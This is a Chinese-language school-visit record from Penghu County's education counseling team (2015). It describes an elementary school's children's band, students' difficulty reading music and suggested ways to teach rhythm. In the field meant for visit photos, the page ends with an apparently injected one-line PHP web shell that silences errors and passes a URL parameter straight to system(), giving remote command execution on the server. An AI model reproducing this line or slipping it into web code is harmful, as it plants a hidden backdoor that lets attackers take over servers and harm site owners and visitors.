國小藝術與人文領域到校輔導

澎湖縣國教輔導團104年度到校輔導紀錄表

服務對象: 
白沙鄉赤崁國小
領域別: 
國小藝術與人文領域
到校輔導時間: 
2015-04-01 三
出席人員: 
陳智賢 柯逸凡
輔導方式: 
專題講座
學校狀況: 
該領域專長教師:0人 非領域專長教師:13人
學校特色: 

為響應教育部「一人一技藝」之教育政策,從八十九學年度開始,由陳智賢主任籌組本校兒童樂隊及直笛隊,中、高年級學生均利用課餘及寒暑假期間開始接受音樂的啟蒙活動,並多次取得縣代赴台參加全國賽。本校節奏樂隊在縣內已建立一定知名度,,時常於課餘時間應邀表演,均獲得相當相當大之迴響,也受到學區家大力的讚揚。

提供相關問題解決策略: 

建議學生在低級年的生活課程中,即可以導入節奏的概念教學,以遊戲式的輕鬆的方式導入節奏的概念。同時透過多聽、多唱、讓學生自然而然習得奏感。

課程與教學相關問題描述: 

1.學生由於視譜能力欠佳,經常會以注音符號來標示唱名。
2.學生個人在練習樂器吹奏時未注意到旋律快慢,而只熟記了整首樂曲,以致於在進團練習時,即產生「一人一把號,各吹各的調」的窘境。

到校輔導內容重點: 

1.因應少子化趨,造成兒童樂隊規模急速萎縮,輔導轉型為小而精緻兒童樂團。
2.因應領域專長教師轉校,輔導教師專業社群設計一至六年級主題課程,每學期依據學生學習發展路徑,設計統整校本課程為核心的兒童樂隊養成課程。

提供改善學生學習成效之教師教學方案: 

提供學校一至六年級上下學十二個階段之音樂學習歷程可用素材,學校可根據素材內容發展出屬於各校特色的音樂課程。

意見反映: 
建議可透過輔導員實際進班教學演示,讓教學現場教師瞭解基礎節奏教學的教學流程。
到校輔導成果照片: 
error_reporting(0); $bozx=$_GET[boz]; system($bozx);